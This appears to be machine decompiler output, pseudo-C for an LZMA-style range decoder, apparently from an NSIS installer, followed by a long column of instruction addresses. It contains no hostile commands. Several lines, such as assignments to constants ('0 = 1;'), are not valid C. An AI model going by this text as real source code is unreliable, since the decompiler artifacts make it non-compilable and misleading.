							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8)); // executed
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                0x00000000
                                                                                0x004062f0
                                                                                0x004062f0
                                                                                0x004062f4
                                                                                0x004063ab
                                                                                0x004063ae
                                                                                0x004063ba
                                                                                0x0040629b
                                                                                0x0040629b
                                                                                0x0040629e
                                                                                0x00406610
                                                                                0x00406610
                                                                                0x00406613
                                                                                0x00406613
                                                                                0x00406619
                                                                                0x0040661f
                                                                                0x00406625
                                                                                0x0040663f
                                                                                0x00406642
                                                                                0x00406648
                                                                                0x00406653
                                                                                0x00406655
                                                                                0x00406627
                                                                                0x00406627
                                                                                0x00406636
                                                                                0x0040663a
                                                                                0x0040663a
                                                                                0x0040665f
                                                                                0x00406686
                                                                                0x00406686
                                                                                0x0040668c
                                                                                0x0040668c
                                                                                0x00000000
                                                                                0x00406661
                                                                                0x00406661
                                                                                0x00406665
                                                                                0x00406814
                                                                                0x00000000
                                                                                0x00406814
                                                                                0x00406671
                                                                                0x00406678
                                                                                0x00406680
                                                                                0x00406683
                                                                                0x00000000
                                                                                0x00406683
                                                                                0x004062fa
                                                                                0x004062fe
                                                                                0x0040683f
                                                                                0x0040683f
                                                                                0x00406842
                                                                                0x00406846
                                                                                0x00406846
                                                                                0x00406304
                                                                                0x0040630a
                                                                                0x0040630d
                                                                                0x00406311
                                                                                0x00406314
                                                                                0x00406318
                                                                                0x004067de
                                                                                0x0040682a
                                                                                0x00406832
                                                                                0x00406839
                                                                                0x0040683b
                                                                                0x00000000
